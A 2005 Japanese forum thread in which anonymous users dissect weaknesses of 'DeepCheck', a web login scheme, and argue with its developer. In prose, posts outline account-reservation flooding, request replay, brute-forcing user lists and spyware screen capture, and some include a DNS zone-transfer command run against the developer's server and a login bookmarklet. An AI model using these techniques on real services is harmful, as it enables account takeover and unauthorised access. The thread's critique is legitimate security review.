名無しさん@お腹いっぱい。 :2005/11/22(火) 22:48:01
ちなみに四つ目と五つ目はサービス問題だからな。
>>303 学術的状況設定(ビニールハウス環境)では、面白いテーマでしょうが、そんな個別の強度
が、実社会で、どんな意味を持つのでしょう。
「ブルートフォース」?総当たりは勝ち目が無いって
>>410 さんは見抜いたじゃないですか?
この程度の話しだったら、DeepCheck+の完成に注力したいので、この辺で止めましょう。
あなたが、少しは、知識人である事は、よく解りました。
308 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:52:57
410氏は「ブルートフォースでは勝ち目が無い」ではなく、「ブルートフォースでしか勝てない」と言ったんだが? 問題点をまとめておこう。 ・スパイウェア対策としては乱数表に劣る ・既存システムに対応できない ・パスワードの強度が低い ・アカウントの新規登録を妨害できる ・条件によっては一度スニフされただけでアカウントが漏洩する その他、DeepCheckの利点を挙げろ、という命題もある。 残り5レス。 学術的?笑わせるな。技術的裏付けができないセキュリティシステムなどクソの役にも立たん。 自ら「お祈りしているのと同じレベル」だと吐露したということか?白旗ならキッチリ揚げろ。
>>305 大間違い
でも、よくお試しいただいて、こころから感謝ています。
310 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:53:39
>>309 どこがどう間違っているのか示せない限りお前の寝言でしかない。
残り4レス。
311 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:54:51
>>307 ふざけんなよ。
>あなたが、少しは、知識人である事は、よく解りました。
少しは?
お前を基準にするなら2ちゃんねらーは全員雲上人みたいなもんだ。
お前に知識が無さ過ぎるだけだよ。俺が書いていることは誰にだって気付ける範囲でしかない。
>>286 >
>>284 極貧のため逆引き契約中止した。
じゃぁなんで125.100.44.163は逆引きできるんだよ?
第一。逆引きの異状ができなかったとしてもその場合にはプロバイダが適当な
逆引きを設定しているもんだ。
313 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:58:06
俺はソースを見ずに大まかな動作だけを見ているんだぜ。 内部処理をしっかり作りこんでいるなら、特に四つ目と五つ目は簡単に反論できるはずだ。 それができないのは何故だろうね?
314 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 22:59:19
>>312 本当にUSENのファミリータイプだったかの安いヤツで契約してるのかもしれませんぜ旦那
>>308 残念、この程度のぶんせきだったのか!
何度もだして悪いが
>>410 氏が肉薄してきたので、正直焦っていたのですが、このやり取りを
みると、ウワッペラ。学校レベルで決めつけ認識。
オイラがオヤジだからといって色眼鏡で見下したのが失敗だw。
どちらにしろ、DeepCheck+を近々発表しますから、そのとき改めてやりましょう。
DeepCheck+を発表できたら、deepchecker-MLに入っていただいている方には先に、その後数日して
オープンソース化しようと思っていrます。
>>314 さん
これだけISPが多くなると無理も無いが、USENのサイトでもいって、調べた方が良いかも知れない。
できればファミリータイプだと割安なのでこちらにしたい事情はあるが、なんせ、上りがね。
317 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:03:13
>>315 残り3レス。
反論できないのかな?
五つで収めてやっているのはまだ優しいほうなんだぜ。
ウワッペラってどこの言葉か知らないが、薄っぺらで上っ面だけ取り繕おうとしているのは誰かな?
試行した上で問題点を「指摘してやっている」んだ。
感謝するのが礼儀だろうが。なんだその態度は。
クソシステムしか作れない無能のクソジジイにチャンスをくれてやっているのがまだわからんのか。
残り3レス。
わかっているのか?
>>315 DeepCheck+では、DeepCheckのどの問題点がどういうふうに解決されているんですか?
320 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:04:46
>>316 無駄話をしている余裕は無いってことも理解できなかったようだな。
残り2レス。これが
>>313 宛てなら見逃してやらなくもなかったが、残念ながら
>>314 は俺なんでね。
俺へのレスとして1レス消費カウントをいれさせてもらうよ。
321 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:05:24
>>319 さすがにこれをカウントするのは野暮だな。
残り2レス。厳しいぞ。
322 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:08:01
問題点を再掲しておこう。 ・スパイウェア対策としては乱数表に劣る ・既存システムに対応できない ・パスワードの強度が低い ・アカウントの新規登録を妨害できる ・条件によっては一度スニフされただけでアカウントが漏洩する ちなみに問題点はこれで全てではない。 その他、DeepCheckの利点を挙げろ、という命題もある。
ウチのWebサーバーは、実は、ルート取られてるんだ。 侵入後の一部はトレースできてるんだけど、不完全。 いましがた、メールサーバをつぶされた。 タチは悪くないんで、すぐ復旧させた。 こいつの腕は凄いぞ。ほんとに勉強になる。
324 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:10:50
のこり1レス。
よく解った事、ひとつ。
>>322 さんとは対話できない。
326 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:12:29
ちなみに本物の凄腕はメールサーバを潰すような野暮なまねはしない。 スクリプトキディか試し撃ちの厨房に食われたか、あるいはジサクジエンで話題そらしか。 なんにしろ浦本の低レベルさがにじみ出たレスで貴重なレスをつぶしたな。
327 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:13:17
ゲーム終了。 結果、浦本は ・試行したユーザの提示した問題点に何ら回答できなかった ・DeepCheckの利点を何一つ提示できなかった 以上。
328 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:16:52
では、回答例といこうか。 問題点としてあげた五つのうち、4番目と5番目はサービス問題だった。 4番目の回答例を示そう。 deepCheckのデモではアカウント名を「予約」できた。 予約したアカウント名は別人が「予約」できない。つまり、アカウントを作成できない。 無数のアカウントを「予約」するリクエストはいくらでも投下できるため、実質的にアカウント作成を 通常の他の認証方式に付随するアカウント作成より簡単に妨害できる。 対処として、たとえば「セッション管理を併用して同一端末から連続して三つ以上予約できないよう 制限をかけている」とか、「同一アドレスからの予約は新しいものから三件のみ保持して古いものは 開放している」などと回答できれば、それで問題点は論破できたことになる。 この程度のサービス問題にも対応できなかったDeepCheckと浦本勝久。底の浅さがよくわかる。
>>327 さん
おれにはあなたが逃げている背中しか見えないが。
>>329 自分が逃げているから他人が遠さがっているように見えるんだろうね。
逃げてるのはうらもちーの方
>>286 >
>>284 極貧のため逆引き契約中止した。
162.44.100.125.in-addr.arpa. IN PTR 8300G.x-fer.co.jp.
163.44.100.125.in-addr.arpa. IN PTR ns.x-fer.co.jp.
164.44.100.125.in-addr.arpa. IN PTR mini142.x-fer.co.jp.
165.44.100.125.in-addr.arpa. IN PTR pbg3x500.x-fer.co.jp.
じゃあこの辺の設定消しとけよ。
正直に、162.160/29.44.100.125.in-addr.arpa. の PTR レコードを設定す
るのがわかりませんでしたって言えばいいのにね。
使いにくいと評判の DeepCheck を使いやすくするブックマークレットを書いてみたお
以下をつなげて一行にしてアドレスバーにはりつけ
javascript:b=%22
http://deepcheck.x-fer.co.jp:8084/noiselet%3FopcodeStr=ninsyo& accountID=%22+prompt(%22id%22)+%22&hMypassword=%22;a=prompt(%22pass%22);
for(i=0;i%3Ca.length;i++)b+=%220123456789abcdefghijklmnopqrstuvwxyz%22.indexOf
(a.charAt(i))+%22,%22;b+=%22&pattrnStr=0,0,0,0,0&cliantTypeStr=ajax%22;location.href=b;
>> 323 ふつう、そのような状態になったら、ケーブル引っこ抜くと思いますが。 なぜ、ケーブルを抜かないんですか?
契約中止したのにまだ委譲してもらってんのね。 usen がそんな間抜けな ISP とも思えないんだが。 % dig 160/29.44.100.125.in-addr.arpa. @ns01.usen.ad.jp 160/29.44.100.125.in-addr.arpa. 10800 IN NS uns02.usen.ad.jp. 160/29.44.100.125.in-addr.arpa. 10800 IN NS ns.x-fer.co.jp.
337 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:23:40
パスワード強度の問題を解説しようか。 パスワードは一般的にアルファベット26文字を二種(大文字小文字混在)に数字十種、 さらに記号「!#$%&;+:*」あたりを入れることができる。文字種だけで52+10+いくつか。 計算を簡単にするためにざっくり70文字種としよう。 対するDeepCheckはわずか36文字種にすぎない。 パスワードの強度は概算として、文字種の文字数乗で計算される。 一般的な8文字パスワードなら、70の8乗だね。576480100000000通りのうち一つとなる。 DeepCheckなら、同じ8文字で、36の8乗。2821109907456通り。この時点でケタが二つ違う。 つまり、DeepCheckで使えるパスワードは、明らかに弱い。 それだけでなく、ISMS等ではパスワードの文字種に記号等を含めるよう推奨している。 ってことは、DeepCheckを使うと、ISMSの認証も取れないし、安心安全マークも取得できないし、 プライバシーマークも取得できない、ということになる。 大問題だね。
>>333 まだこんな事いっている人がいる。
>165.44.100.125.in-addr.arpa.
なんて、どこにも書込んでいませんぜ。
毛嫌いしないで、MacOS-X Server も少ししらべてみたら?
らくだよ〜。
339 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:24:55
>>329 俺に一太刀でも浴びせてから寝言を吐けや、この負け犬が。
340 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:25:46
>>338 そんな楽なサーバなら少しはマトモに運用しろよ
>>338 >
>>333 まだこんな事いっている人がいる。
> >165.44.100.125.in-addr.arpa.
> なんて、どこにも書込んでいませんぜ。
% dig -t axfr 44.100.125.in-addr.arpa. @ns.x-fer.co.jp
44.100.125.in-addr.arpa. 3600 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005112200 3600 3600 604800 3600
44.100.125.in-addr.arpa. 3600 IN NS ns.x-fer.co.jp.
44.100.125.in-addr.arpa. 3600 IN NS wtk-ns01.usen.ad.jp.
162.44.100.125.in-addr.arpa. 3600 IN PTR 8300G.x-fer.co.jp.
163.44.100.125.in-addr.arpa. 3600 IN PTR ns.x-fer.co.jp.
164.44.100.125.in-addr.arpa. 3600 IN PTR mini142.x-fer.co.jp.
165.44.100.125.in-addr.arpa. 3600 IN PTR pbg3x500.x-fer.co.jp.
44.100.125.in-addr.arpa. 3600 IN SOA ns.44.100.125.in-addr.arpa. katuhisa_.mac.com. 2005112200 3600 3600 604800 3600
書いてないつもりなだけだろ。
勝負あったな〜 10レスのやりとり、すげー分かりやすかった。 今までバラバラだった議論がすっきりまとまってた。 つか、浦本さんはすでに聖域に入っておられるようだ(笑
345 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:28:32
346 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:28:32
さあて、まだまだ解説しようか。
DeepCheckを使うとWEBサイトとして信用を失う、ってのは、
>>337 で明らかにした通り。
さらに、スパイウェア対策として乱数表に劣るということの解説だ。
・・・・これは俺が書くより、高木先生のサイト見てもらうほうが早いな。
乱数表よりDeepCheckのほうが「アタリ」を引きやすいってだけのことだ。
要するに、スパイウェア対策としては、DeepCheck は乱数表に劣る。
強度が低くてスパイウェア対策にもならず、さらにはサイトの信頼性まで落とすDeepCheck。
誰がこんなもの使うんだろうね。
正直、パスワード強度に関しては言い掛かりかと思ったんだが、
>>337 を見て納得した。
348 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:33:23
>>346 > 誰がこんなもの使うんだろうね。
マゾと浦本
349 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:33:43
既存システムに対応できない、ってのは、分散ナントカもそうだけど、 認証後のセッション管理が何一つ提示されていないってことが問題でもある。 つまり、従来の Cookie や hidden フィールドを併用したセッション管理に移行できるのかって問題。 セッション情報を生成して従来のアプリケーションに引き渡せるインターフェイスが必要なんだけど そんなものが用意されている形跡が無かったんだよね。 つまり、既存のものを改修する際に導入、ってわけにはいかないだろうということ。 新規案件がわんさか沸いてくるならまだしも、今はITバブルもはじけてしまっているし、オンラインで 認証を云々、っていうことをしているサイトはボチボチ安定稼動しているところばかりだ。 いまから新規参入は難しい。 さらに、先に例示したようにそもそも信頼性を損ねたりしがちな認証システムだ。 これじゃあ売れないだろう。
350 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:39:04
最後。サービス問題だった五番目。 カーソル行を変更する際の操作で、現在のパスワード+現在のパスワード、という文字列を 投下してから変更操作を行うようになっていた。 つまり、ログイン操作相当のセッションで、同じパターンが繰り返されているパターンが出現 する、ということになる。 この場合、HTTP リクエストにはカーソル行五つ分のシーザー暗号でいうスライド値と パターンそのもの、ユーザ名が含まれる。 このリクエストを再送するだけで、ログインできてしまう可能性がある。 これも、セッション管理していて別端末からのログインは却下する、とか、いちどログインしてから 別画面でカーソル行を変更するとか、カーソル行変更と同時にパスワードも変更させるように なっている、とかいえれば、問題点は論破できたんだ。実に簡単な問題でしかなかったんだよ。 以上、これで五つの問題点は全部解説できたかな。
351 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:42:22
実はほかの問題点として、 ・Windows Server 系のものに導入するのにコストがかかりすぎる とか、 ・Perl や ruby でのスクリプトに対応してるのか? とか、 ・ASP や PHP のセッション管理と結合できるのか? っていう導入時点での問題もあって、仮にDeepCheckの内容を誤魔化して導入検討まで 持ち込めたとしても、かなりハードルは高い、つまり売れそうに無いってところなんだよね。 品質も売り方もなにもかもショボすぎて、お話になりませんよってところ。
また、浦本に無視されたので質問を三度書き込み。
この質問には答えられるよな?
>>85 > また、セキュリティ=暗号の高度化と思い込んだ人がいかに多いか、はっきりしただけでも、nemo への
> 投稿は意味があった。
「セキュリティ=暗号の高度化」が問題ならば、その問題点と影響を具体的に例示すること。
前にも言ったんだけど、無視されたんだよな。
334 を書いてみてわかったんだが pattrnStr=0,0,0,0,0 が通るので、外から総当たりするには hMypassword に 0-35,0-35,... をいれていけばいい ただパスワードが最大百桁とのことなので ura アカウントでの総当たりは厳しそうだな
>> 349 何年前の話しをしているのですか? >セッション管理が何一つ提示されていないってこと サーブレット書けば、いま、ミドルウエアでほとんどやってくれてる事解りますよ。 >セッション情報を生成して従来のアプリケーションに引き渡せるインターフェイスが必要なんだけど >そんなものが用意されている形跡が無かったんだよね。 そうですか、メタに埋め込めば、Cookie や hidden フィールドへも連携取れるんですよ。 そいで、DeepCheckBase のソースみて話してるでしょ。だから、そうとう話しがずれてますよ。 --- DeepCheckBase は、ちゃんとよんでもらえれば、ユーザビリティは低いけど、スパイウエアに 強いのは、すぐ解る。 さすがに、そのままでは、使用範囲が限定されるので、DeepCheckへ移行したんです。
>>354 > DeepCheckBase は、ちゃんとよんでもらえれば、ユーザビリティは低いけど、スパイウエアに
> 強いのは、すぐ解る。
それが俺には全然わからないんだよね。。。
俺だけじゃなくて、たぶん、浦本さん以外のほとんどの人間にはわからないと思うんだ。
どうしてスパイウェアに強いか説明していただけますか?
356 :
名無しさん@お腹いっぱい。 :2005/11/22(火) 23:59:14
ゲームオーバーなんだけど、せっかくだから相手してやろうか。 まず、ブルートフォース。最大100桁というが、はたしてそれだけの文字数を投下するかね?あのUIで。 実質的には10桁程度で充分だ。そして、おそらくその程度ならブルートできない問題じゃない。 しかもパスワード文字列の後半部分はなんでもいい。 むしろ、パスワードをヒットさせるのを目的にせず、パスワードを特定文字列に変更させることを 目的にすれば、検出させる必要がなくなる。つまり、 ・「予約」操作を自動化してユーザリストを取得 ・ユーザに対してブルートフォース おそらくこの一般的な手順で、ふつうの UNIX アカウントより簡単にヒットさせることができると思う。 さらに、だ。セッション管理がサーブレットモノだとしても、既存のものと接続できないことにはかわりない。 サーブレットで管理しているセッションって、ASPのセッションに接続できたっけ? そういったモノを作らなきゃつなげられないってのは不便極まりない。つまり、検討段階でハネられる。 スパイウェア対策の無能さは次で。
>>336 さん
仕事立て込んでて、今日やっとセカンダリの設定をやってもらったはず。
>>351 >品質も売り方もなにもかもショボすぎて、お話になりませんよってところ。
先に結論ありきですね。
見逃している事があるんだけど。
だれも指摘しない。
>>352 さん。すまん。後日答えさせてください。
DeepCheck+の作業を止めて答えてる自分が、少々、辛い。
358 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:04:30
現在、スパイウェアの中でスクリーンショットを取るものが現れている。 これは、乱数表を併用したオンラインバンキングがスパイウェアで破られたときに発覚している。 同様にDeepCheckでスクリーンショットを取ると、どんなカーソルパターンでどのような操作を したか、これが全部取れてくる。 さて、スニフィングでパスワードが漏洩することは前スレで明らかにされているが、DeepCheckの 場合、画面上の操作がそのままJavaScriptでリクエストボディに整形されたうえで送出されている。 つまり、ログイン画面にアクセスすればそのロジックが取得できるってわけだ。 画面上の操作と、その操作をもとにしたリクエストを送出するロジックがそろえば、そのとき送出した リクエストボディが再現できる。つまり、スニフしたのと同じ結果が得られる。 これによって、乱数表では36通り(6x6マスを想定)のパターンのうち数回、おそらく5回〜10回程度 操作を取得してパターンを特定しなければならないのに対して、DeepCheckでは前スレでのキャプチャ 解析に基づいて、二回から三回の操作記録でパスワードが取得できる。 つまり、乱数表を用いた現在よくあるオンラインバンキング方式より、DeepCheckはスパイウェアに弱い。
>>357 悪いことは言わない。
DeepCheckの問題点を再分析した方がいいよ。
そんで、問題点を再認識して、それをDeepCheck+にちゃんと反映してくれ。
360 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:07:08
>>357 先に結論ありきだと言うなら、その決め付けたらしい結論とやらをひっくりかえしてみろよ。
見逃していること?DeepCheckがもっとクソだってことか?
浦本さん、 DeepCheck の問題点から目をそらしちゃだめだって。 それじゃ DeepCheck+ でも DeepCheck++ でも DeepCheckII'turboX でも 同じ過ちを繰り返すことになりますよ。 いや、マジでさ…。
>>358 さん
結論が間違ってる。途中までは、少し誤解があるものの中くらいのニアミス。
で、論理てきに証明しようといくら頑張っても傍証でしかない。
なんで、実際に破らないのかな〜。
つーか、スパイウェアって別に画面の操作だけ見てるわけじゃないからなぁ……
何を以て「スパイウェアに強い」と言ってるのか非常によくわからん。
なんであんたのブログで
http://uramoty.exblog.jp/3783929/ まで書いといて、それであんたの方式だとスパイウェアに強いという事になるのか……
「何も解決していない事に気づきながら、もうこれ以上の設計が出来ないから
粗悪品だけどなんとかどっかに買ってもらって一息つきながらなんとか解決策を
その買ってもらった資金で考えよう」
と思っているんだよな?
364 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:13:51
>>362 破ってるってば。
キャプチャしなくても目視で操作は取得できる。
あとは読み込んでるスクリプトのファイルのロジック通りにやればいい。
自動化するかしないかだけの差でしかない。
敗れていないなら論理的にどこが矛盾しているのかどこが間違っているのか指摘してみろよ。
>>361 さん。ありがとう。
でもね、よく考えると、あなたにいわれなくても >問題点から目をそらしちゃだめだって。
は、やってるつもり。
以下にユーザビリティを良くするか、の方だけど。
今日はこれで、おしまい。
366 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:15:15
>>363 それが、画面の操作を見ているだけで取れちゃうんだよ。
マスキングしたパスワード入力フィールドだけならまだマシだったんだけど、
わざわざ赤いマークで「この五文字のうちどれかを入れてますよー」って教えてるんだから。
>>357 別に後日答えたいなら答えても良いけど、これ答えるのそんなに大変なのか?
「セキュリティ=暗号の高度化と思い込んだ人がいかに多いか」という思いがあって、DeepCheckを作ったんじゃないの?
それなら例を示す事なんてすぐにできそうなんだけど。
368 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:16:34
>>365 だから、「つもり」なんて実社会では通用しないんだってば。
結果が全てなの。で、お前が出した結果は使い物にならないDeepCheck。
UIをいくら改善しようとしても、DeepCheckの基本仕様ではもうダメだってこと。
浦本は結論ありきのやつだからな。 理由を考えるのに大変なんだろう。
>>362 >
>>358 さん
> 結論が間違ってる。途中までは、少し誤解があるものの中くらいのニアミス。
ウラモティー、「間違っている」とだけ言っても説得力ゼロですよw
論理的な根拠と理由を述べましょうね。議論の相手に失礼だよ。
371 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:19:36
>>366 書いて気付いた。
つまり、何文字入れようがスパイウェアが画面をキャプチャしていれば、
DeepCheckのパスワード強度は「文字数の五乗」にしかならない。
仮に100文字入れても、10000000000通りにしかならないんだよ。
だって、各ケタの文字がそれぞれ五文字に限定されちゃうんだから。
これ、致命的じゃね??
なにも画面キャプチャでなくても、ブラウザの送信するフォーム内容を全部奪 うスパイウェアがあればいいじゃん
>>367 さん
セカンドオピニオンとかいうじゃないですか、暗号化をより進める事だけで、なんとか試用としている
傾向が強すぎると思いませんか?
DeepCheckみたいな変わったやり方の枝もあってもよさそうなんだけど。
枝と申したか。
375 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:23:55
あ、違うわ。 カーソル行は固定だから、キャプチャしていたら何文字入れていようが五通りだ。 あとは文字をケツからまずは一文字、次は二文字・・と入れていけばいい。 つまり、文字数の半分の期待値でパスワードがGETできる。 100文字入れたとして、必ず1文字はログインに使うパスだから、 1〜99回の試行で済む。つまり、期待値は50回。 強度もクソもねえんじゃないか、これ。
376 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:24:33
>>373 変わったやり方があってもいいとは思うけど、
それが従来のものよりはるかに劣るんじゃあ意味が無い。
>>373 DeepCheckがセカンドオピニオンになるんですか?
頭が悪いのかいまいち理解できない。
>暗号化をより進める事だけで、なんとか試用としている
>傾向が強すぎると思いませんか?
ここを具体的にお願いします。
私は問題点とその影響を例示するようお願いしました。
378 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:26:39
>>372 まさにその通り。
ただ、ネットワークキャプチャするのってSystem権限とかrootとかAdministratorがいるから、
スパイウェアとしてはそういった機能は実装しにくいのよね。
むしろ、画面上で操作しているフォームに対してメッセージフックを仕込んでキーボード操作を
横取りするとか、スクリーンキャプチャする、ってのが実装しやすい。
これらの機能には高い権限が必要ないから、たいていのユーザの操作に対応できるんだ。
>>378 ブラウザのプラグインとして実装したらいいんでないかい?
380 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:29:33
>>372 あ、ごめん。
>>378 書いてから気付いた。フォームの内容を横取りするだけならなんとかなるわ。
ネットワークをキャプチャする必要なんかなかった。変なこといってごめんね。
>>372 の中の人は正しかった。おいらが勘違いしただけでした。スマソ
381 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:30:38
>>379 うん、その手もあるし、ブラウザのインスタンス掴んでスクリプト注入してもいい。
スニフする必要があるものだと勘違いしちゃった。許せ('A`)
>>373 > セカンドオピニオンとかいうじゃないですか、暗号化をより進める事だけで、なんとか試用としている
> 傾向が強すぎると思いませんか?
なるほど、浦本さんの気持ちは何となく分かった。
暗号の強化路線とは違う路線を歩いているんだってことだね。
だからセキュリティを計る尺度もまた、違う視点なのだと。
考え方が既存暗号システムとは異なることはよくわかったよ。
だけどさ、既存の製品と勝負するなら、やっぱりちゃんと安全性を検証する必要があるわけですよ。
新しいことをやろうっていう意気込みは評価するけど、今のものよりも安全性が低かったら、意味がないでしょ?
安全だというなら、どんな方法で評価されたって、安全なはずだ。
既存の方法で評価されると安全じゃないけど、新しい視点で評価すれば安全だ、なんてのは、意味がないよ。
だからちゃんと、みんなの質問にも正面から答えるべきだと思いますよ。
やっとほんりゅうになりつつあるかな! 410 さんとは、DeepCheck+でわたりあうんで、みなさん、スパイウエアを仕掛けようが、ルートを徒労が なんでも構いませんので、机上の論理ではなく、実際に破ってください。 お願いします。(なんか、へんな感じ!!\(^o^)/)
>>383 だからさっさとキャプチャデータ晒せと。
キャプチャデータがない今の状態では総当たりしかできない。
総当たりの場合 ura アカウントのパスワード文字数が長いと
終わらないし、サーバにとんでもない負荷がかかりますよ?
>>382 よく書いてくれました。その通りです。
新しいから、尺度が無いのです。残念です。数値で表す方法を知りません。
だから実証にこだわっているのです。
今まで出ている、計算法では、近似値さえ得られません。
ある方に少し頼んだのですが断られました。方法が無いそうです。
387 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:40:08
つまりあれか。 DeepCheckそのもので勝負はついたから、鯖クラコンテストに変更ってことか?
388 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:40:46
>>386 有効性を示す方法がないってことだろ。
どうやっても俺が論証したようにクソだって結果しか出ないんだからな。
明日のあさを楽しみにしています。 おやすみなさい。
>>367 ですが、
浦本さん、後日答えてくれるって事は別にかまわないんだけど、
いつまでに答えてくれるのか期限を決めてくれない?
まぁ、3日もあれば十分だと思うけどさ。
391 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:43:57
てか、近似値もクソもねえって。 想像を絶する対スパイウェア耐性の低さとか、 そもそもパスワード文字種の制限による信頼性の低下とか、 操作性の悪さに起因するユーザ離れとか、 導入コストがかかりすぎるとか、 そもそも導入して安定稼動できるかどうかもわかんねえとか、 はじめから使い物にならねえってんだよ。 そのへんの信頼性とか強度とかのデータはカタログ値でメーカーが出すもんだ。 データ取りに参加させようってんなら、せめてコンサル費用くらい出せ。 名無し集団相手だから、そうだな。ひろゆきにサーバ費用でも寄付してやれ。 一か月分くらい肩代わりしてやれよ。そうしたらたぶん無数のねらーが試してくれる。
392 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:44:42
仕方ねえな。 本当にクラック仕掛けていいんだな?
>スパイウエアを仕掛けようが スパイウェアは普通クライアントに仕掛けられるのをご存じ?
>>392 本人の許可が出てるから不正アクセスには引っかからないと思う。
一応念押しした方が良いけどね。
395 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:47:34
つっても普通に考えたらHTTPとSMTP、せいぜいPOPくらいしかサービス開けてないはずだから ふつーーーーに考えたらそう簡単にクラックできるとは思えんのだがなあ。 たしかOs Xって自動アップデートあるし。ウチの鯖だってcronでyumしてるだけだけど、ここ一年の 中韓からのアタックに何気なく耐えてるくらいだからな。 チープチェクのソース読むのもタルいし('A`) すっげー萎えた。DeepCheckそのものなんてどうでもよかったんだな、結局は。
396 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:48:56
契約書みたいなもんが必要だろうなあ。 管理者の了解が取れてないとマズいし。 やっぱこんなクズ相手に鋼鉄の鎖つきブレスレットは損失が大きすぎるな。
結局、
>>318 には答えない浦本。
DeepCheck+はUIぐらいしか変更されてないんだろうな。。。
>>397 でも、浦本さん曰く「使いやすさと安全はトレードオフ」だそうなので、
使いやすくしちゃったら安全ではなくなってしまう。
>>398 ってことは、さらに使いにくくなってるのか!!
401 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 00:55:36
だってさ。 文字種を増やすとするじゃまいか。 大文字小文字併用したら、横スクロールの幅がなんと62文字に到達するんだぞ。 そんなのをJavaScriptで五行いちどにスクロールさせて・・・想像したくないくらい重そうだ。 文字種を減らしたらそれだけで強度は落ちるってか、おいらが指摘した「ISMSもPマークも 安心安全マークも取得できない」って状況が悪化するわけで、やっぱり使い物にならない。 UIをなんとかしてどうにかなるレベルじゃないんだけどなあ。
ま、浦本さんは根本的にセキュリティ関連の技術に対する理解が足りないんだよな。
>>382 への返答が
>>386 か...
結局、浦本さんのいう「実証」ってのはサーバがクラックされるかどうかってことだったの?
そりゃ、みんなと話が噛み合わないわけだ。
サーバがクラックされてもされなくても実証にはならないと思いますよ。
DeepCheckを使ってなくても世の中のほとんどのサーバはクラックされてないし、
DeepCheckサーバがクラックされても、それはDeepCheckの問題じゃなくて、
サーバプログラムや設定の問題だろうし...
404 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 01:07:15
とりあえずおいらは酒も抜けたので、GyaOで空中元弥チョップとかインリン様vsHGとか見ます。
もしかして、浦本はスパイウェアをサーバ側だけの問題と考えてるのかもな・・・。 それなら今までの発言も合点がいくかも。
フォーーーーーーーーーーーーーーー!!!!(●∀●)
407 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 01:30:55
もとやちょっぷ・・・・・orz
409 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 01:52:21
浦本って今年うちに入った新人より使えないよ…。 そう言えば浦本の新人時代ってどうだったんだろう(笑)
410 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 01:59:53
ハッスルマニアおもすれー(笑 HGvsインリンは何気に面白かったお^^ アメリカ式のエンターテイメントプロレスの系列でなかなかに面白いすよ。 浦本の新人時代は想像したくねえな(笑
412 :
名無しさん@お腹いっぱい。 :2005/11/23(水) 02:20:35
>>411 うははwwwwww貴殿も見てたのねwwwwwwwwwwwwwwwwwww
いやほんと、モトヤチョップはどうでもいいからとりあえずインリン様vsハードゲイ見とけ。
以外に動けるHGとか見所多いぞ。しかも笑えるし。とりあえず一月までは見れるから、
スカっと笑い飛ばしたいときにはオススメ。
GyaOのまわしものじゃないよwwwwwwwwwwww
ウラモティがネットストーカーのようにしつこい(キモイ…)のでここでハッキリ書きますが、 『私は前175氏の少し後にDeepCheckを論理的に破りました。手書きの計算で破りました。』 ウラモティが言うとおり実システム上では破ってません。これはまぎれもない事実です。 しかしそれは検証する側にとって重要なことではありません。私は事実試してもいないのです。 『DeepCheckは論理的に完全に破れます。』 みなさん、これは事実であり結果です。 以後、これは"DeepCheckに関する公理"として下さい。
>>413 (自己レス)
念のため補足しとく。
ウラモティはいつものように目をそらしてまともにに読まないだろうが、その他の閲覧者様へ。
> ウラモティが言うとおり実システム上では破ってません。これはまぎれもない事実です。
> しかしそれは検証する側にとって重要なことではありません。私は事実試してもいないのです。
何故こう言うのかと言うと、
【1】
論理的に破れれば実システムで破れる可能性が非常に高い。
また、逆に論理的に破ることが出来ないのならば実システムで破られる可能性はほぼ皆無。(※あくまで技術を正面から破ることに関して)
よって論理的に破ることの重要さが証明される。
【2】
企業などに実際にシステム導入する際には運用のための事前テストとして実際にシステム上で検証をおこなうことは非常に大事であることは事実。
しかし、今はそういうことではない。また実システムと言ってもウラモティが用意してるのは単なるデモでしかない。
このデモシステムで破った破れなかったというのはあまり意味が無い。
【3】
セキュリティシステムの検証をするにはあまりにお粗末な環境である。
信頼できる第三者が真偽判定してくれるわけでもない。テストデータが提示もされていない。
公正な判断をしかねる環境上では何らかのアクションを起こしても何の証明もすることもできない。
【4】
手っ取り早く、事実が把握できれば良い。
よって、論理的検証だけで十分。DeepCheckは論理的に破れる、それがわかっただけで俺はもう良いの。ダメさがわかったから。
